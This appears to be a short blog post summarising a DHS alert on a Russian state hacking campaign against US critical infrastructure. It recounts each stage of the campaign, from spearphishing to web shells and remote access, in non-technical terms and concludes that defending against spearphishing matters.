Yesterday the Department of Homeland Security issued an alert entitled, Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors.  The alert warns about how the Russians are seeking to interfere with critical U.S. infrastructure using cyber tools.

How bad is the problem?  This is a screen shot reconstruction of Russians gaining unauthorized access to an industrial control system.

DHS used Lockheed’s 7-Stage Cyber Kill Chain framework to describe the details of the Russian threat.

  1. Reconnaissance. The Russians researched their targets for information to use in spearphishing emails. There were two classes of targets. There are “staging targets” which were compromised because of their trusted relationship with the “intended targets.” The intended targets are operators of critical infrastructure.
  2. Weaponization. The Russians used a two-step approach.  In Weapon A (spearphishing) they created phishing emails with malicious payloads to staging targets and intended targets. Emails to staging targets stole credentials from the staging targets which facilitated Weapon B.  In Weapon B (watering hole) the stolen credentials were used to compromise the trusted website of the staging target, turning the trusted website into a credential harvesting website.
  3. Delivery. The weaponized spearphishing emails were delivered to the staging targets and intended targets.
  4. Exploitation. The phishing campaigns redirected the staging targets personnel to websites that appeared to be trusted destinations and which presented the victims with fake login pages to harvest user names and passwords. The phishing campaigns to intended targets using credential harvesting .docx files. The watering holes created in Stage 2 were also used for the same credential harvesting process.
  5. Installation. The stolen credentials were used for system access and to create local administrator accounts for the Russians to use. With access established a wide variety of skulduggery was enabled.
  6. Command and Control. The Russian created web shells on the intended targets’ publicly accessible email and web servers.
  7. Actions on Objectives. The Russians were able to establish remote access services and infrastructure such as VPN, RDP and Outlook Web Access. With these services, they could engage in additional reconnaissance, including accessing and copying information on accessing industrial control systems (the screenshot above).  The Russians also engaged in anti-forensic activities to cover their tracks.

This kill chain analysis shows the importance defending against spearphishing.